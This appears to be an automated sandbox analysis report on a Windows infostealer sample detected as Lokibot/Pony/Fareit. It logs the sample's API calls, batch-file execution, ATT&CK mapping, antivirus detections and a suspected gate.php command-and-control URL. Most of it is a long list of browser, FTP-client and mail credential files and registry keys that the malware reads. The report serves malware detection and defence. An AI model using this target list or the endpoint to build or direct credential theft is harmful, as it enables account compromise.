Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

0_2_00410065

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_0040F984 mov eax, dword ptr fs:[00000030h]

0_2_0040F984

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_004105D6 SetUnhandledExceptionFilter,RevertToSelf,

0_2_004105D6

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_0041032D lstrcmpi,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,72A85300,ImpersonateLoggedOnUser,RevertToSelf,72A75000,CloseHandle,

0_2_0041032D

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' '

Jump to behavior

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_004044D2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_004044D2

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_004045FD

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_0041051E OleInitialize,GetUserNameA,

0_2_0041051E

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_004045FD

Stealing of Sensitive Information:

Detected Lokibot Info Stealer

Show sources

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_00409832 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,

0_2_00409832

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Program Files (x86)\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Program Files (x86)\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Windows\32BitFtp.ini	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Windows\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat	Jump to behavior

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword		0_2_0040EBA3
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword		0_2_0040EBA3

Remote Access Functionality:

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Scripting1	Valid Accounts1	Valid Accounts1	Deobfuscate/Decode Files or Information1	OS Credential Dumping2	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Access Token Manipulation11	Scripting1	Credentials in Registry2	File and Directory Discovery3	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection11	Obfuscated Files or Information1	Security Account Manager	System Information Discovery23	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Install Root Certificate1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Security Software Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Valid Accounts1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion1	DCSync	Process Discovery11	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation11	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection11	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
eQDy6dGVwQ.exe	84%	Virustotal		Browse
eQDy6dGVwQ.exe	89%	Metadefender		Browse
eQDy6dGVwQ.exe	96%	ReversingLabs	Win32.Infostealer.Fareit
eQDy6dGVwQ.exe	100%	Avira	TR/PSW.Fareit.iloen
eQDy6dGVwQ.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.1.eQDy6dGVwQ.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.eQDy6dGVwQ.exe.400000.0.unpack	100%	Avira	TR/PSW.Fareit.iloen	Download File
0.2.eQDy6dGVwQ.exe.400000.0.unpack	100%	Avira	TR/PSW.Fareit.iloen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://https://ftp://operawand.dat_Software	0%	Avira URL Cloud	safe
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	0%	Avira URL Cloud	safe
http://63e2e5290bcf.ngrok.io/gate.php	0%	Avira URL Cloud	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
